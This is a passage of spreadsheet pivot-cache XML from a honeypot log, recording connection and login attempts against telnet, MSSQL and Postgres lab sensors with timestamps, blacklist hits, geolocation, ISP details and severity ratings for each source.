    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Agra"/>
    <s v="Agra (Sanjay Place)"/>
    <s v="1279259"/>
    <s v="282002"/>
    <s v="27.2004"/>
    <s v="78.0045"/>
    <s v="59162"/>
    <s v="UPCSPL-AS-IN"/>
    <s v="Waves NET Solutions"/>
    <s v="corporate"/>
    <s v="Waves NET Solutions"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7286:169c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="973"/>
    <x v="973"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T23:18:47"/>
    <d v="2025-04-23T23:18:47"/>
    <d v="2025-04-23T23:18:47"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Agra"/>
    <s v="Agra (Sanjay Place)"/>
    <s v="1279259"/>
    <s v="282002"/>
    <s v="27.2049"/>
    <s v="78.0072"/>
    <s v="59162"/>
    <s v="UPCSPL-AS-IN"/>
    <s v="U P Infomax Pvt Ltd"/>
    <s v="corporate"/>
    <s v="U P Infomax PVT LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6711:3321"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="974"/>
    <x v="974"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T22:41:49"/>
    <d v="2024-12-24T18:37:52"/>
    <d v="2025-04-23T22:41:49"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H23"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d212:8a10"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="975"/>
    <x v="975"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T22:35:38"/>
    <d v="2025-04-23T22:35:38"/>
    <d v="2025-04-23T22:35:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:6d76"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="976"/>
    <x v="976"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T22:28:51"/>
    <d v="2025-04-23T22:28:51"/>
    <d v="2025-04-23T22:28:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:703"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="977"/>
    <x v="977"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T22:28:18"/>
    <d v="2025-04-23T22:28:18"/>
    <d v="2025-04-23T22:28:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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1:e4dc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="978"/>
    <x v="978"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T22:25:10"/>
    <d v="2025-04-23T22:25:10"/>
    <d v="2025-04-23T22:25:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:ee23"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="979"/>
    <x v="979"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T22:22:37"/>
    <d v="2025-04-23T22:22:37"/>
    <d v="2025-04-23T22:22:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:f92f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="980"/>
    <x v="980"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T22:20:50"/>
    <d v="2025-04-16T00:12:59"/>
    <d v="2025-04-23T22:20:50"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kuala Lumpur City Centre)"/>
    <s v="1735161"/>
    <s v="50088"/>
    <s v="3.15823"/>
    <s v="101.713"/>
    <s v="9534"/>
    <s v="Maxis Broadband Sdn Bhd"/>
    <s v="Maxis Broadband Sdn Bhd"/>
    <s v="residential"/>
    <s v="Maxis Broadband Sdn.Bhd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ec0:c07b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="981"/>
    <x v="981"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T22:10:24"/>
    <d v="2024-12-22T20:31:27"/>
    <d v="2025-04-23T22:10:24"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BO"/>
    <s v="Bolivia"/>
    <s v="L"/>
    <s v="La Paz Department"/>
    <s v="Pedro Domingo Murillo Province"/>
    <s v="La Paz"/>
    <s v="3911925"/>
    <s v="NA"/>
    <s v="-16.4897"/>
    <s v="-68.1193"/>
    <s v="27882"/>
    <s v="Telefónica Celular de Bolivia S.A."/>
    <s v="Telefónica Celular de Bolivia S.A."/>
    <s v="business"/>
    <s v="Telefónica Celular de Bolivia S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b5bc:8942"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="982"/>
    <x v="982"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T22:07:07"/>
    <d v="2024-11-25T13:38:44"/>
    <d v="2025-04-23T22:07:07"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="5432"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.1967"/>
    <s v="106.822"/>
    <s v="17995"/>
    <s v="PT iForte Global Internet"/>
    <s v="PT iForte Global Internet"/>
    <s v="business"/>
    <s v="Solusinet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a5:c5f2"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="983"/>
    <x v="983"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T21:57:03"/>
    <d v="2024-12-07T03:49:17"/>
    <d v="2025-04-23T21:57:03"/>
    <n v="50"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2"/>
    <s v="1433&amp;&amp;445&amp;&amp;55833&amp;&amp;55838"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="BB Multiplay Static"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-Static"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,55181)}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,55424)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,56882)}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,57397)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,54102)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:5e24"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="984"/>
    <x v="984"/>
    <s v="NA&amp;&amp;190-77-72-244.dyn.dsl.cantv.net"/>
    <x v="0"/>
    <d v="2025-04-23T21:14:16"/>
    <d v="2025-04-23T11:58:37"/>
    <d v="2025-04-23T21:14:16"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="VE"/>
    <s v="Venezuela"/>
    <s v="M"/>
    <s v="Miranda"/>
    <s v="Chacao Municipality"/>
    <s v="Caracas (Los Palos Grandes)"/>
    <s v="3646738"/>
    <s v="NA"/>
    <s v="10.4966"/>
    <s v="-66.8446"/>
    <s v="8048"/>
    <s v="CANTV Servicios, Venezuela"/>
    <s v="CANTV Servicios, Venezuela"/>
    <s v="business"/>
    <s v="CANTV Servicios, Venezuela"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:be4d:48f4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="985"/>
    <x v="985"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T21:11:39"/>
    <d v="2024-12-08T18:36:31"/>
    <d v="2025-04-23T21:11:39"/>
    <n v="341"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Atibaia"/>
    <s v="Atibaia"/>
    <s v="3471335"/>
    <s v="NA"/>
    <s v="-23.1169"/>
    <s v="-46.5503"/>
    <s v="269715"/>
    <s v="INFINITYGO TELECOM LTDA"/>
    <s v="Infinitygo Telecom Ltda"/>
    <s v="business"/>
    <s v="Infinitygo Telecom Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb3e:56de"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is trying to scan and exploit various network services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. They are attempting to gather information about the network infrastructure, identify potential vulnerabilities, and gain unauthorized access to sensitive data. &amp;&amp; No log data provided to analyze, so there is nothing to describe regarding possible malicious activity."/>
    <s v="Port scanning &amp;&amp; There is no log data provided. Please provide the actual log data for analysis."/>
  </r>
  <r>
    <x v="986"/>
    <x v="986"/>
    <s v="118-232-125-148.dynamic.kbronet.com.tw&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-23T21:07:07"/>
    <d v="2025-03-12T06:52:24"/>
    <d v="2025-04-23T21:07:07"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0466"/>
    <s v="121.541"/>
    <s v="38841"/>
    <s v="kbro CO. Ltd."/>
    <s v="kbro CO. Ltd."/>
    <s v="business"/>
    <s v="KBRO"/>
    <s v="2007-11-01"/>
    <s v="KBRO-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2007-08-27 14:41:18"/>
    <s v="2026-08-27 00:00:00"/>
    <s v="NA"/>
    <s v="ns1.kbronet.com.tw     211.76.112.59 _x000a_      ns2.kbronet.com.tw     211.76.112.60"/>
    <s v="TFN"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:76e8:7d94"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="987"/>
    <x v="987"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T21:01:27"/>
    <d v="2025-04-23T21:01:27"/>
    <d v="2025-04-23T21:01:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>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8:67b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="988"/>
    <x v="988"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T20:38:46"/>
    <d v="2023-10-06T13:20:00"/>
    <d v="2025-04-23T20:38:46"/>
    <n v="75"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="14147&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="113"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="residential"/>
    <s v="BHARTI"/>
    <s v="2006-12-19"/>
    <s v="ABTS-KK-DSL-9102-blr"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
